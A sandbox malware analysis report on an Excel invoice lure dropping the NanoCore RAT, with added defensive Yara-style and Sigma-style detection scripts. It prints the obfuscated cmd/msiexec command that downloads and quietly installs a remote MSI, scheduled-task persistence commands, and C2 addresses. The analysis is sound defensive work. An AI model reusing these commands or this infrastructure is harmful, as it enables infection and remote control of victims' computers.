
Analysis Report Overdue Invoices before 5-04-2020.xls

Overview

General Information

Sample Name: Overdue Invoices before 5-04-2020.xls
MD5: 4a1b031536cb803ece7a69f6fdfcdb25
SHA1: 0b860cf8fa06344a449fb4fdb7cad3a1d12c9df9
SHA256: 410b37038436dfd621def737f102dce7ae9ac6a7c39323f9d0f4f48e72231334

Detection

Nanocore
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Detected Nanocore Rat
Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for domain / URL
Multi AV Scanner detection for submitted file
Sigma detected: NanoCore
Sigma detected: Scheduled temp file as task from temp location
Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)
Yara detected Nanocore RAT
.NET source code contains potential unpacker
Document contains an embedded VBA macro which may execute processes
Document contains an embedded VBA macro with suspicious strings
Document contains an embedded VBA with many string operations indicating source code obfuscation
Document exploit detected (process start blacklist hit)
Hides that the sample has been downloaded from the Internet (zone.identifier)
Injects a PE file into a foreign processes
Machine Learning detection for dropped file
Machine Learning detection for sample
Modifies the context of a thread in another process (thread injection)
Obfuscated command line found
Sigma detected: Microsoft Office Product Spawning Windows Shell
Uses dynamic DNS services
Uses schtasks.exe or at.exe to add and modify task schedules
Antivirus or Machine Learning detection for unpacked file
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Contains functionality to call native functions
Contains functionality to open a port and listen for incoming connection (possibly a backdoor)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected TCP or UDP traffic on non-standard ports
Detected potential crypto function
Document contains an embedded VBA macro which executes code when the document is opened / closed
Document contains embedded VBA macros
Drops PE files
Enables debug privileges
Found inlined nop instructions (likely shell or obfuscated code)
Installs a raw input device (often for capturing keystrokes)
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Potential document exploit detected (performs DNS queries)
Potential document exploit detected (unknown TCP traffic)
Uses code obfuscation techniques (call, push, ret)
Yara signature match

Classification

Startup

  • System is w7
  • EXCEL.EXE (PID: 3916 cmdline: 'C:\Program Files\Microsoft Office\Office14\EXCEL.EXE' /automation -Embedding MD5: 716335EDBB91DA84FC102425BFDA957E)
    • cmd.exe (PID: 3988 cmdline: 'C:\Windows\System32\cmd.exe' /C ms^iE^x^ec /i http://unifedslashclub.com/igm/rrraw.msi /qn MD5: AD7B9C14083B52BC532FBA5948342B98)
      • msiexec.exe (PID: 4036 cmdline: msiExec /i http://unifedslashclub.com/igm/rrraw.msi /qn MD5: 4315D6ECAE85024A0567DF2CB253B7B0)
  • MSIFBF6.tmp (PID: 2064 cmdline: C:\Windows\Installer\MSIFBF6.tmp MD5: A56ABA6661C6F1E9F3A8114C40D88C70)
    • MSIFBF6.tmp (PID: 2180 cmdline: {path} MD5: A56ABA6661C6F1E9F3A8114C40D88C70)
      • schtasks.exe (PID: 2184 cmdline: 'schtasks.exe' /create /f /tn 'WAN Service' /xml 'C:\Users\user\AppData\Local\Temp\tmp927B.tmp' MD5: 2003E9B15E1C502B146DAD2E383AC1E3)
      • schtasks.exe (PID: 2080 cmdline: 'schtasks.exe' /create /f /tn 'WAN Service Task' /xml 'C:\Users\user\AppData\Local\Temp\tmp9634.tmp' MD5: 2003E9B15E1C502B146DAD2E383AC1E3)
  • taskeng.exe (PID: 2232 cmdline: taskeng.exe {B623727B-AFE4-4B99-8F3C-68535BA9AAD4} S-1-5-21-290172400-2828352916-2832973385-1004:computer\user:Interactive:[1] MD5: 4F2659160AFCCA990305816946F69407)
    • MSIFBF6.tmp (PID: 2300 cmdline: C:\Windows\Installer\MSIFBF6.tmp 0 MD5: A56ABA6661C6F1E9F3A8114C40D88C70)
      • MSIFBF6.tmp (PID: 2388 cmdline: {path} MD5: A56ABA6661C6F1E9F3A8114C40D88C70)
      • MSIFBF6.tmp (PID: 2308 cmdline: {path} MD5: A56ABA6661C6F1E9F3A8114C40D88C70)
      • MSIFBF6.tmp (PID: 2512 cmdline: {path} MD5: A56ABA6661C6F1E9F3A8114C40D88C70)
    • wansv.exe (PID: 2356 cmdline: 'C:\Program Files\WAN Service\wansv.exe' 0 MD5: A56ABA6661C6F1E9F3A8114C40D88C70)
  • wansv.exe (PID: 2448 cmdline: 'C:\Program Files\WAN Service\wansv.exe' MD5: A56ABA6661C6F1E9F3A8114C40D88C70)
    • wansv.exe (PID: 2564 cmdline: {path} MD5: A56ABA6661C6F1E9F3A8114C40D88C70)
  • cleanup

Reading the tree: the Excel macro runs cmd.exe with a caret-obfuscated command (ms^iE^x^ec, which cmd.exe resolves to msiexec), msiexec installs an MSI fetched over plain HTTP with /qn (quiet, no UI), and the binary msiexec extracts from that package runs as C:\Windows\Installer\MSIFBF6.tmp. That binary registers two scheduled tasks ('WAN Service' and 'WAN Service Task') from XML files in the user's Temp directory, and the same executable (identical MD5 A56ABA6661C6F1E9F3A8114C40D88C70) is then launched by taskeng.exe both from its Installer path and as C:\Program Files\WAN Service\wansv.exe. Each copy spawns a child with the {path} placeholder, which is the injected NanoCore client (see the Yara matches on PIDs 2180, 2512 and 2564 below).

Malware Configuration

Threatname: NanoCore

{"C2: ": ["185.244.30.216", "255.255.255.255"], "Version: ": "NanoCore Client, Version=1.2.2.0"}

Note on the extracted configuration: 255.255.255.255 is the IPv4 limited-broadcast address, not a reachable C2, so the only live server here is 185.244.30.216. That matches the observed beacon (192.168.2.2:49160 -> 185.244.30.216:8417) and the Snort alert in the Networking section. The run also queries the dynamic-DNS name socket-controller.ddns.net; treat the hostname, the IP and TCP port 8417 together as indicators.

Yara Overview

Memory Dumps

Source | Rule | Description | Author
  (Strings: offset:$identifier: matched string)

00000006.00000002.1144452115.040A0000.00000004.00000001.sdmp | Nanocore_RAT_Gen_2 | Detects the Nanocore RAT | Florian Roth
  • 0x1f1db:$x1: NanoCore.ClientPluginHost
  • 0x1f1f5:$x2: IClientNetworkHost
00000006.00000002.1144452115.040A0000.00000004.00000001.sdmp | Nanocore_RAT_Feb18_1 | Detects Nanocore RAT | Florian Roth
  • 0x1f1db:$x2: NanoCore.ClientPluginHost
  • 0x22518:$s4: PipeCreated
  • 0x1f1c8:$s5: IClientLoggingHost
00000006.00000002.1144254626.03E30000.00000004.00000001.sdmp | Nanocore_RAT_Gen_2 | Detects the Nanocore RAT | Florian Roth
  • 0x13a8:$x1: NanoCore.ClientPluginHost
00000006.00000002.1144254626.03E30000.00000004.00000001.sdmp | Nanocore_RAT_Feb18_1 | Detects Nanocore RAT | Florian Roth
  • 0x13a8:$x2: NanoCore.ClientPluginHost
  • 0x1486:$s4: PipeCreated
  • 0x13c2:$s5: IClientLoggingHost
00000010.00000002.778516355.00402000.00000040.00000001.sdmp | Nanocore_RAT_Gen_2 | Detects the Nanocore RAT | Florian Roth
  • 0xff8d:$x1: NanoCore.ClientPluginHost
  • 0xffca:$x2: IClientNetworkHost
  • 0x13afd:$x3: #=qjgz7ljmpp0J7FvL9dmi8ctJILdgtcbw8JYUc6GC8MeJ9B11Crfg2Djxcf0p8PZGe
(67 entries in total; the first five are shown)

Unpacked PEs

Source | Rule | Description | Author
  (Strings: offset:$identifier: matched string)

6.2.MSIFBF6.tmp.3f50000.14.unpack | Nanocore_RAT_Gen_2 | Detects the Nanocore RAT | Florian Roth
  • 0x1deb:$x1: NanoCore.ClientPluginHost
  • 0x1e24:$x2: IClientNetworkHost
6.2.MSIFBF6.tmp.3f50000.14.unpack | Nanocore_RAT_Feb18_1 | Detects Nanocore RAT | Florian Roth
  • 0x1deb:$x2: NanoCore.ClientPluginHost
  • 0x1f36:$s4: PipeCreated
  • 0x1e05:$s5: IClientLoggingHost
6.2.MSIFBF6.tmp.3e30000.12.raw.unpack | Nanocore_RAT_Gen_2 | Detects the Nanocore RAT | Florian Roth
  • 0x13a8:$x1: NanoCore.ClientPluginHost
6.2.MSIFBF6.tmp.3e30000.12.raw.unpack | Nanocore_RAT_Feb18_1 | Detects Nanocore RAT | Florian Roth
  • 0x13a8:$x2: NanoCore.ClientPluginHost
  • 0x1486:$s4: PipeCreated
  • 0x13c2:$s5: IClientLoggingHost
6.2.MSIFBF6.tmp.3f70000.15.unpack | Nanocore_RAT_Gen_2 | Detects the Nanocore RAT | Florian Roth
  • 0x3d99:$x1: NanoCore.ClientPluginHost
  • 0x3db3:$x2: IClientNetworkHost
(59 entries in total; the first five are shown)
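The offsets in the Strings column above are where the rule's string atoms were found in each memory dump or unpacked PE. The following is an added example (not the report's code and not Florian Roth's rules): a stand-alone scanner that looks for the same four NanoCore identifiers in a byte buffer, in both ASCII and UTF-16LE form, and prints matches in the same offset:string style. The buffer it scans by default is constructed here to imitate the 03E30000 dump, with the identifiers placed at the offsets the report lists (0x13a8, 0x13c2, 0x1486); the "one $x-class plus one $s-class string" verdict is my heuristic, not the condition of the real Yara rules. Run it against a real dump with the file path as the first argument.

```python
import sys

# Identifier strings the report's two Yara rules key on (taken from the Strings column).
# $x-class: NanoCore-specific class names. $s-class: supporting, weaker strings.
X_STRINGS = (b"NanoCore.ClientPluginHost", b"IClientNetworkHost")
S_STRINGS = (b"PipeCreated", b"IClientLoggingHost")


def find_all(buf, needle):
    """Every offset of needle in buf, searched as ASCII and as UTF-16LE.
    .NET stores type/member names as UTF-8 in the metadata heap and user strings
    as UTF-16LE, so a process dump may carry either form."""
    hits = []
    wide = needle.decode("ascii").encode("utf-16-le")
    for enc_name, pattern in (("ascii", needle), ("utf16le", wide)):
        start = 0
        while (i := buf.find(pattern, start)) >= 0:
            hits.append((i, enc_name))
            start = i + 1
    return hits


def scan(buf):
    """Map identifier -> list of (offset, encoding) for all four strings."""
    return {s.decode("ascii"): find_all(buf, s) for s in X_STRINGS + S_STRINGS}


def looks_like_nanocore(buf):
    """Heuristic verdict (mine, not the Yara rules' condition): require at least one
    $x-class and at least one $s-class identifier, so 'PipeCreated' alone never fires."""
    found = scan(buf)
    strong = any(found[s.decode("ascii")] for s in X_STRINGS)
    support = any(found[s.decode("ascii")] for s in S_STRINGS)
    return strong and support


def report_lines(buf, source):
    """Lines in the report's 'offset: string' style, one per hit."""
    return [f"{source}: 0x{off:x}: {name} ({enc})"
            for name, hits in scan(buf).items() for off, enc in hits]


def build_sample():
    """Constructed 8 KiB buffer imitating the 03E30000 dump: the identifiers sit at the
    offsets the report lists, plus one UTF-16LE copy of IClientNetworkHost at 0x1800."""
    buf = bytearray(0x2000)
    for off, s in ((0x13a8, b"NanoCore.ClientPluginHost"),
                   (0x13c2, b"IClientLoggingHost"),
                   (0x1486, b"PipeCreated")):
        buf[off:off + len(s)] = s
    wide = "IClientNetworkHost".encode("utf-16-le")
    buf[0x1800:0x1800 + len(wide)] = wide
    return bytes(buf)


if __name__ == "__main__":
    if len(sys.argv) > 1:
        source, data = sys.argv[1], open(sys.argv[1], "rb").read()
    else:
        source, data = "constructed-sample", build_sample()
    for line in report_lines(data, source):
        print(line)
    print("verdict:", "NanoCore indicators present" if looks_like_nanocore(data) else "no match")
```

The UTF-16LE pass matters in practice: a string such as a pipe name or a C2 host stored as a .NET user string will not be found by an ASCII-only search, which is why the real rules use the `wide` modifier where it applies.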

Sigma Overview


System Summary:

Sigma detected: NanoCore
Source: File created; Author: Joe Security; Data: EventID: 11, Image: C:\Windows\Installer\MSIFBF6.tmp, ProcessId: 2180, TargetFilename: C:\Users\user\AppData\Roaming\0F4F5130-48FA-4204-B1C4-585FBB81CD25\run.dat
Sigma detected: Scheduled temp file as task from temp location
Source: Process started; Author: Joe Security; Data: Command: 'schtasks.exe' /create /f /tn 'WAN Service' /xml 'C:\Users\user\AppData\Local\Temp\tmp927B.tmp', CommandLine: 'schtasks.exe' /create /f /tn 'WAN Service' /xml 'C:\Users\user\AppData\Local\Temp\tmp927B.tmp', CommandLine|base64offset|contains: j, Image: C:\Windows\System32\schtasks.exe, NewProcessName: C:\Windows\System32\schtasks.exe, OriginalFileName: C:\Windows\System32\schtasks.exe, ParentCommandLine: {path}, ParentImage: C:\Windows\Installer\MSIFBF6.tmp, ParentProcessId: 2180, ProcessCommandLine: 'schtasks.exe' /create /f /tn 'WAN Service' /xml 'C:\Users\user\AppData\Local\Temp\tmp927B.tmp', ProcessId: 2184
Sigma detected: Microsoft Office Product Spawning Windows Shell
Source: Process started; Author: Michael Haag, Florian Roth, Markus Neis; Data: Command: 'C:\Windows\System32\cmd.exe' /C ms^iE^x^ec /i http://unifedslashclub.com/igm/rrraw.msi /qn , CommandLine: 'C:\Windows\System32\cmd.exe' /C ms^iE^x^ec /i http://unifedslashclub.com/igm/rrraw.msi /qn , CommandLine|base64offset|contains: , Image: C:\Windows\System32\cmd.exe, NewProcessName: C:\Windows\System32\cmd.exe, OriginalFileName: C:\Windows\System32\cmd.exe, ParentCommandLine: 'C:\Program Files\Microsoft Office\Office14\EXCEL.EXE' /automation -Embedding, ParentImage: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE, ParentProcessId: 3916, ProcessCommandLine: 'C:\Windows\System32\cmd.exe' /C ms^iE^x^ec /i http://unifedslashclub.com/igm/rrraw.msi /qn , ProcessId: 3988
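The process tree in the Startup section and the Sigma matches above describe three process-creation detections that a SOC would want to reproduce from its own Sysmon/EDR telemetry: an Office product spawning a shell, msiexec installing a package from an HTTP URL, and schtasks creating a task from an XML file in a Temp directory. The block below is an added example, not the report's code and not the text of the Sigma rules it is named after: rule logic written by me, run over process events reconstructed from the report (PIDs 3988, 4036 and 2184 with their listed command lines; the full image paths for msiexec.exe and the parent cmd.exe are assumed) plus two constructed benign events that must not fire. The point it demonstrates is that cmd.exe caret escaping ('ms^iE^x^ec') defeats a plain substring match on "msiexec", so the command line has to be normalised the way cmd.exe would parse it before any pattern is applied.

```python
import re
from dataclasses import dataclass


@dataclass(frozen=True)
class ProcessEvent:
    pid: int
    image: str
    parent_image: str
    command_line: str


OFFICE_IMAGES = {"excel.exe", "winword.exe", "powerpnt.exe", "outlook.exe", "msaccess.exe"}
SHELL_IMAGES = {"cmd.exe", "powershell.exe", "wscript.exe", "cscript.exe", "mshta.exe", "msiexec.exe"}
TEMP_DIRS = ("\\appdata\\local\\temp\\", "\\windows\\temp\\")


def basename(path):
    """Lower-cased file name of a (possibly quoted) Windows path."""
    return path.strip("'\"").replace("/", "\\").rsplit("\\", 1)[-1].lower()


def normalize_cmd(cmdline):
    """Undo cmd.exe caret escaping the way the interpreter does: '^x' -> 'x', '^^' -> '^'.
    'ms^iE^x^ec' becomes 'msiExec'. Case is left alone so extracted URLs/paths stay intact."""
    return re.sub(r"\^(.)", r"\1", cmdline)


def office_spawning_shell(ev):
    """Sigma 'Microsoft Office Product Spawning Windows Shell' in spirit: parent is Office."""
    parent, child = basename(ev.parent_image), basename(ev.image)
    if parent in OFFICE_IMAGES and child in SHELL_IMAGES:
        return f"{parent} -> {child}"
    return None


# msiexec /i <http(s) URL>: remote package install, matched on the de-escaped command line
# rather than on the image name, so it also fires on the cmd.exe line that launches it.
MSI_REMOTE = re.compile(r"msiexec(?:\.exe)?\b.*?/i\s+['\"]?(https?://\S+)", re.IGNORECASE)


def msiexec_remote_install(ev):
    m = MSI_REMOTE.search(normalize_cmd(ev.command_line))
    return m.group(1).rstrip("'\"") if m else None


# /xml <path>; paths containing spaces would need the quoted form handled, which the
# report's sample does not require.
SCHTASKS_XML = re.compile(r"/xml\s+['\"]?([^'\"\s]+)", re.IGNORECASE)


def schtasks_xml_from_temp(ev):
    """Sigma 'Scheduled temp file as task from temp location' in spirit."""
    if basename(ev.image) != "schtasks.exe":
        return None
    cmd = normalize_cmd(ev.command_line)
    if "/create" not in cmd.lower():
        return None
    m = SCHTASKS_XML.search(cmd)
    if m and any(d in m.group(1).lower() for d in TEMP_DIRS):
        return m.group(1)
    return None


RULES = {
    "office_spawning_shell": office_spawning_shell,
    "msiexec_remote_install": msiexec_remote_install,
    "schtasks_xml_from_temp": schtasks_xml_from_temp,
}


def detect(events):
    """Return (rule, pid, detail) for every rule that fires on every event."""
    hits = []
    for ev in events:
        for name, rule in RULES.items():
            detail = rule(ev)
            if detail:
                hits.append((name, ev.pid, detail))
    return hits


SAMPLE_EVENTS = [
    # Reconstructed from the report's process tree / Sigma section (image paths of the
    # msiexec.exe child and its cmd.exe parent are assumed).
    ProcessEvent(3988, r"C:\Windows\System32\cmd.exe",
                 r"C:\Program Files\Microsoft Office\Office14\EXCEL.EXE",
                 r"'C:\Windows\System32\cmd.exe' /C ms^iE^x^ec /i http://unifedslashclub.com/igm/rrraw.msi /qn"),
    ProcessEvent(4036, r"C:\Windows\System32\msiexec.exe", r"C:\Windows\System32\cmd.exe",
                 r"msiExec /i http://unifedslashclub.com/igm/rrraw.msi /qn"),
    ProcessEvent(2184, r"C:\Windows\System32\schtasks.exe", r"C:\Windows\Installer\MSIFBF6.tmp",
                 r"'schtasks.exe' /create /f /tn 'WAN Service' /xml 'C:\Users\user\AppData\Local\Temp\tmp927B.tmp'"),
    # Constructed benign events: task XML outside Temp, and a doubled caret that is literal.
    ProcessEvent(5001, r"C:\Windows\System32\schtasks.exe", r"C:\Windows\explorer.exe",
                 r"schtasks.exe /create /tn Backup /xml C:\ProgramData\Backup\task.xml"),
    ProcessEvent(5002, r"C:\Windows\System32\cmd.exe", r"C:\Windows\explorer.exe",
                 r"cmd.exe /c echo ^^caret is literal here"),
]

if __name__ == "__main__":
    for name, pid, detail in detect(SAMPLE_EVENTS):
        print(f"{name:24s} pid={pid:<5d} {detail}")
```

Note that the msiexec rule fires twice, once on the cmd.exe line (PID 3988) and once on msiexec.exe itself (PID 4036); the first of these is the one a substring match without caret normalisation would miss.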

Signature Overview


AV Detection:

Found malware configuration
Source: MSIFBF6.tmp.2512.16.memstr; Malware Configuration Extractor: NanoCore {"C2: ": ["185.244.30.216", "255.255.255.255"], "Version: ": "NanoCore Client, Version=1.2.2.0"}
Multi AV Scanner detection for domain / URL
Source: unifedslashclub.com; Virustotal: Detection: 10%
Multi AV Scanner detection for submitted file
Source: Overdue Invoices before 5-04-2020.xls; ReversingLabs: Detection: 20%
Yara detected Nanocore RAT
Source: Yara match; File source: 00000010.00000002.778516355.00402000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match; File source: 00000006.00000002.1141230461.02937000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match; File source: 00000005.00000002.750001957.02BC9000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match; File source: 00000012.00000002.808447398.00402000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match; File source: 00000006.00000002.1138226637.00402000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match; File source: 00000006.00000002.1143756620.03B70000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match; File source: 0000000C.00000002.762486074.028D9000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match; File source: 00000010.00000002.784430727.029D0000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match; File source: 00000012.00000002.810188013.01CB0000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match; File source: 00000012.00000002.810240200.02CB0000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match; File source: 0000000E.00000002.762179363.029E9000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match; File source: 00000010.00000002.784111444.019D0000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match; File source: 00000011.00000002.787203529.02B29000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match; File source: 00000006.00000002.1143109529.0330F000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match; File source: Process Memory Space: MSIFBF6.tmp PID: 2180, type: MEMORY
Source: Yara match; File source: Process Memory Space: MSIFBF6.tmp PID: 2512, type: MEMORY
Source: Yara match; File source: Process Memory Space: wansv.exe PID: 2564, type: MEMORY
Source: Yara match; File source: 6.2.MSIFBF6.tmp.3b70000.5.unpack, type: UNPACKEDPE
Source: Yara match; File source: 18.2.wansv.exe.400000.1.unpack, type: UNPACKEDPE
Source: Yara match; File source: 16.2.MSIFBF6.tmp.400000.1.unpack, type: UNPACKEDPE
Source: Yara match; File source: 6.2.MSIFBF6.tmp.3b70000.5.raw.unpack, type: UNPACKEDPE
Source: Yara match; File source: 6.2.MSIFBF6.tmp.400000.1.unpack, type: UNPACKEDPE
Machine Learning detection for dropped file
Source: C:\Program Files\WAN Service\wansv.exe; Joe Sandbox ML: detected
Machine Learning detection for sample
Source: Overdue Invoices before 5-04-2020.xls; Joe Sandbox ML: detected
Antivirus or Machine Learning detection for unpacked file
Source: 18.2.wansv.exe.400000.1.unpack; Avira: Label: TR/Dropper.Gen
Source: 16.2.MSIFBF6.tmp.400000.1.unpack; Avira: Label: TR/Dropper.Gen
Source: 6.2.MSIFBF6.tmp.400000.1.unpack; Avira: Label: TR/Dropper.Gen

Software Vulnerabilities:

Document exploit detected (process start blacklist hit)
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE; Process created: C:\Windows\System32\cmd.exe
Found inlined nop instructions (likely shell or obfuscated code)
Source: C:\Windows\Installer\MSIFBF6.tmp; Code function: 4x nop then lea esp, dword ptr [ebp-0Ch] (6_2_03D277D0)
Source: C:\Windows\Installer\MSIFBF6.tmp; Code function: 4x nop then lea esp, dword ptr [ebp-0Ch] (6_2_03D277C0)
Source: C:\Windows\Installer\MSIFBF6.tmp; Code function: 4x nop then mov esp, ebp (6_2_03D243C8)
Source: C:\Windows\Installer\MSIFBF6.tmp; Code function: 4x nop then lea esp, dword ptr [ebp-0Ch] (6_2_03D2783A)
Potential document exploit detected (performs DNS queries)
Source: global traffic; DNS query: name: unifedslashclub.com
Potential document exploit detected (unknown TCP traffic)
Source: global traffic; TCP traffic: 192.168.2.2:49160 -> 185.244.30.216:8417

Networking:

Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)
Source: Traffic; Snort IDS: 2025019 ET TROJAN Possible NanoCore C2 60B 192.168.2.2:49160 -> 185.244.30.216:8417
Uses dynamic DNS services
Source: unknown; DNS query: name: socket-controller.ddns.net
Detected TCP or UDP traffic on non-standard ports
Source: global traffic; TCP traffic: 192.168.2.2:49160 -> 185.244.30.216:8417
Internet Provider seen in connection with other malware
Source: Joe Sandbox View; ASN Name: unknown unknown
Source: C:\Windows\Installer\MSIFBF6.tmp; Code function: 6_2_014A2D76 WSARecv (6_2_014A2D76)
Source: unknown; DNS traffic detected: queries for: unifedslashclub.com
Source: MSIFBF6.tmp, 00000006.00000002.1140371657.01944000.00000004.00000001.sdmp; String found in binary or memory: http://google.com
Source: msiexec.exe, 00000004.00000002.779594878.0019A000.00000004.00000010.sdmp, msiexec.exe, 00000004.00000002.779135357.00150000.00000004.00000040.sdmp; String found in binary or memory: http://unifedslashclub.com/igm/rrraw.msi
Source: msiexec.exe, 00000004.00000002.780903388.00506000.00000004.00000040.sdmp, msiexec.exe, 00000004.00000002.779092020.00110000.00000004.00000040.sdmp; String found in binary or memory: http://unifedslashclub.com/igm/rrraw.msi/qn
Source: msiexec.exe, 00000004.00000002.779135357.00150000.00000004.00000040.sdmp; String found in binary or memory: http://unifedslashclub.com/igm/rrraw.msi/qns

Installs a raw input device (often for capturing keystrokes)
Source: MSIFBF6.tmp, 00000006.00000002.1141230461.02937000.00000004.00000001.sdmp; Binary or memory string: RegisterRawInputDevices

E-Banking Fraud:

Yara detected Nanocore RAT
Source: Yara match; the same 22 MEMORY and UNPACKEDPE file sources listed under AV Detection above.

System Summary:
